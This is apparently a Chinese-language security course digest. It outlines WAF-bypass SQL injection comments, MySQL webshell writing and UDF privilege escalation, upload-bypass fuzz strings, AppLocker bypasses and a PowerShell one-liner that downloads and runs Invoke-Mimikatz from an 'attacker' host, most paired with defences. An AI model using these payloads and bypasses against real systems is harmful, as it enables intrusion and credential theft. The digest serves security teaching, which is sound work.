红日安全63期：Web及移动安全综合教学文档<\/h1>

一、安全动态<\/h2>

1.1 红日AI安全-基于机器学习的攻击检测系统<\/h3>

核心概念<\/strong>：利用机器学习算法识别异常网络行为<\/li>

关键技术<\/strong>：

特征工程：提取网络流量特征（如请求频率、payload模式）<\/li>
监督学习：使用标记数据集训练分类模型<\/li>
无监督学习：异常检测算法识别未知攻击模式<\/li> <\/ul> <\/li>
应用场景<\/strong>：DDoS检测、SQL注入识别、XSS攻击发现<\/li> <\/ul>
1.2 信息安全漏洞周报(2018年第43期)<\/h3>

漏洞跟踪方法<\/strong>：

CVE编号系统<\/li>
CVSS评分标准<\/li>
漏洞影响范围评估<\/li> <\/ul> <\/li>
关键漏洞示例<\/strong>：

Apache Struts2远程代码执行<\/li>
WordPress插件漏洞<\/li>
IoT设备默认凭证问题<\/li> <\/ul> <\/li> <\/ul>
二、Web安全<\/h2>
2.1 SQL注入绕过WAF技术（内联注释篇）<\/h3>

基本原理<\/strong>：
\/*!SELECT*\/<\/span> *<\/span> FROM<\/span> users WHERE<\/span> id =<\/span> 1<\/span> <\/span><\/span><\/code><\/pre><\/li> 绕过技术<\/strong>： MySQL特性注释：\/*!50727SELECT*\/<\/code><\/li> 注释分割关键词：SEL\/*xxx*\/ECT<\/code><\/li> 空白符变异：SEL%0bECT<\/code><\/li> <\/ul> <\/li> 防御措施<\/strong>：参数化查询<\/li> 输入验证正则表达式<\/li> WAF规则更新策略<\/li> <\/ul> <\/li> <\/ul> 2.2 Tomcat样例目录session操控漏洞<\/h3> 漏洞详情<\/strong>：路径：\/examples\/servlets\/servlet\/SessionExample<\/code><\/li> 攻击方式：会话固定攻击<\/li> 影响版本：Tomcat 7.x\/8.x未加固配置<\/li> <\/ul> <\/li> 修复方案<\/strong>：删除样例应用<\/li> 配置context.xml的<Manager><\/code>设置<\/li> 启用cookie的HttpOnly和Secure标志<\/li> <\/ul> <\/li> <\/ul> 2.3 Email收集神器技术解析<\/h3> 收集方法<\/strong>：爬虫技术：Scrapy框架实现<\/li> 正则表达式模式： r<\/span>'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}'<\/span> <\/span><\/span><\/code><\/pre><\/li> 公开数据源：GitHub代码搜索、WHOIS查询<\/li> <\/ul> <\/li> 防御措施<\/strong>：联系信息混淆技术<\/li> CAPTCHA验证<\/li> 速率限制<\/li> <\/ul> <\/li> <\/ul> 2.4 CMS安全分析（Discuz!篇）<\/h3> 常见漏洞<\/strong>：文件上传绕过（.php5后缀）<\/li> XSS存储型漏洞（用户组名称）<\/li> SQL注入（forum_attachment字段）<\/li> <\/ul> <\/li> 安全配置<\/strong>：关闭插件自动更新<\/li> 设置data目录不可执行<\/li> 定期审核模板文件<\/li> <\/ul> <\/li> <\/ul> 三、渗透测试<\/h2> 3.1 从MySQL出发的反击<\/h3> 权限提升路径<\/strong>：低权限SQL注入 → 2. 读取数据库凭据 → 3. 获取系统shell<\/li> <\/ol> <\/li> 关键技术<\/strong>： into outfile<\/code>写webshell<\/li> UDF提权（lib_mysqludf_sys）<\/li> MySQL日志文件注入<\/li> <\/ul> <\/li> <\/ul> 3.2 优质上传漏洞Fuzz字典<\/h3> 文件上传绕过技术<\/strong>：扩展名变异：file.php.jpg<\/code><\/li> MIME类型伪造：Content-Type: image\/png<\/code><\/li> 双扩展名：file.png.php<\/code><\/li> <\/ul> <\/li> Fuzz字典示例<\/strong>： shell.php%00.jpg shell.php\x0a.jpg .htaccess (php_value engine on) <\/code><\/pre> <\/li> <\/ul> 3.3 Windows AppLocker绕过<\/h3> 绕过技术<\/strong>： InstallUtil.exe执行<\/li> Regsvr32脚本托管<\/li> MSBuild内联任务<\/li> 白名单DLL劫持<\/li> <\/ul> <\/li> 防御措施<\/strong>：启用脚本规则<\/li> 配置DLL规则<\/li> 实施路径规则<\/li> <\/ul> <\/li> <\/ul> 3.4 PowerShell渗透应用<\/h3> 攻击脚本示例<\/strong>： IEX (New-Object Net.WebClient).DownloadString('http:\/\/attacker\/Invoke-Mimikatz.ps1'<\/span>) <\/span><\/span><\/code><\/pre><\/li> 隐蔽技术<\/strong>：编码命令（Base64）<\/li> 内存注入<\/li> 日志清除<\/li> <\/ul> <\/li> 检测方法<\/strong>：脚本块日志记录<\/li> 约束语言模式<\/li> AMSI集成<\/li> <\/ul> <\/li> <\/ul> 四、安全工具<\/h2> 4.1 DirBuster使用指南<\/h3> 配置参数<\/strong>：线程数优化（建议10-20）<\/li> 字典选择（common.txt, directory-list-2.3-medium.txt）<\/li> 递归深度设置<\/li> <\/ul> <\/li> 高级技巧<\/strong>：基于响应的智能识别<\/li> 404页面指纹识别<\/li> 结果导出格式（XML\/CSV）<\/li> <\/ul> <\/li> <\/ul> 4.2 现代密码学工具包<\/h3> 包含算法<\/strong>：非对称加密：RSA\/ECC<\/li> 对称加密：AES\/ChaCha20<\/li> 哈希算法：SHA-3\/BLAKE2<\/li> <\/ul> <\/li> 应用示例<\/strong>： from<\/span> cryptography.hazmat.primitives import<\/span> hashes <\/span><\/span>digest =<\/span> hashes.<\/span>Hash(hashes.<\/span>SHA256()) <\/span><\/span><\/code><\/pre><\/li> <\/ul> 4.3 中国菜刀使用解析<\/h3> 连接配置<\/strong>：加密传输设置<\/li> 自定义UA头<\/li> 连接超时调整<\/li> <\/ul> <\/li> 功能模块<\/strong>：文件管理（权限修改）<\/li> 数据库管理（SQL查询）<\/li> 虚拟终端（命令执行）<\/li> <\/ul> <\/li> <\/ul> 五、代码审计<\/h2> 5.1 escapeshellarg与escapeshellcmd漏洞<\/h3> 危险模式<\/strong>： system<\/span>(escapeshellcmd<\/span>(escapeshellarg<\/span>($input))); <\/span><\/span><\/code><\/pre><\/li> 安全编码<\/strong>：使用白名单过滤<\/li> 避免命令拼接<\/li> 考虑使用proc_open替代system<\/li> <\/ul> <\/li> <\/ul> 5.2 正则表达式路径穿越<\/h3> 漏洞示例<\/strong>： preg_replace<\/span>('\/\.\.\\/\/'<\/span>, ''<\/span>, $input) \/\/ 可被...\/绕过 <\/span><\/span><\/span><\/code><\/pre><\/li> 修复方案<\/strong>：使用realpath函数<\/li> 严格白名单验证<\/li> 结合basename使用<\/li> <\/ul> <\/li> <\/ul> 六、视频课程要点<\/h2> 6.1 网络安全评估框架<\/h3> 评估流程<\/strong>：资产发现 → 2. 漏洞扫描 → 3. 渗透测试 → 4. 风险评估<\/li> <\/ol> <\/li> 关键指标<\/strong>：攻击面测量<\/li> 平均修复时间(MTTR)<\/li> 风险评分模型<\/li> <\/ul> <\/li> <\/ul> 6.2 安全威胁情报应用<\/h3> 情报生命周期<\/strong>：收集 → 分析 → 生产 → 分发 → 反馈<\/li> <\/ul> <\/li> 企业集成<\/strong>： SIEM系统对接<\/li> 自动化阻断规则<\/li> 攻击指标(IOC)管理<\/li> <\/ul> <\/li> <\/ul> 附录：速查表<\/strong><\/p> 漏洞类型<\/th> 测试方法<\/th> 修复方案<\/th> <\/tr> <\/thead> SQL注入<\/td> ' OR 1=1--<\/td> 参数化查询<\/td> <\/tr> XSS<\/td> alert(1)<\/td> 输出编码<\/td> <\/tr> CSRF<\/td> 伪造请求测试<\/td> Anti-CSRF Token<\/td> <\/tr> 文件上传<\/td> 扩展名变异<\/td> 内容检测+随机命名<\/td> <\/tr> <\/tbody> <\/table> 推荐学习路径<\/strong>：<\/p> OWASP Top 10 实践<\/li> PTES渗透测试标准<\/li> MITRE ATT&CK框架研究<\/li> <\/ol>

漏洞类型<\/th>	测试方法<\/th>	修复方案<\/th> <\/tr> <\/thead>
SQL注入<\/td>	' OR 1=1--<\/td>	参数化查询<\/td> <\/tr>
XSS<\/td>	alert(1)<\/td>	输出编码<\/td> <\/tr>
CSRF<\/td>	伪造请求测试<\/td>	Anti-CSRF Token<\/td> <\/tr>
文件上传<\/td>	扩展名变异<\/td>	内容检测+随机命名<\/td> <\/tr> <\/tbody> <\/table> 推荐学习路径<\/strong>：<\/p> OWASP Top 10 实践<\/li> PTES渗透测试标准<\/li> MITRE ATT&CK框架研究<\/li> <\/ol>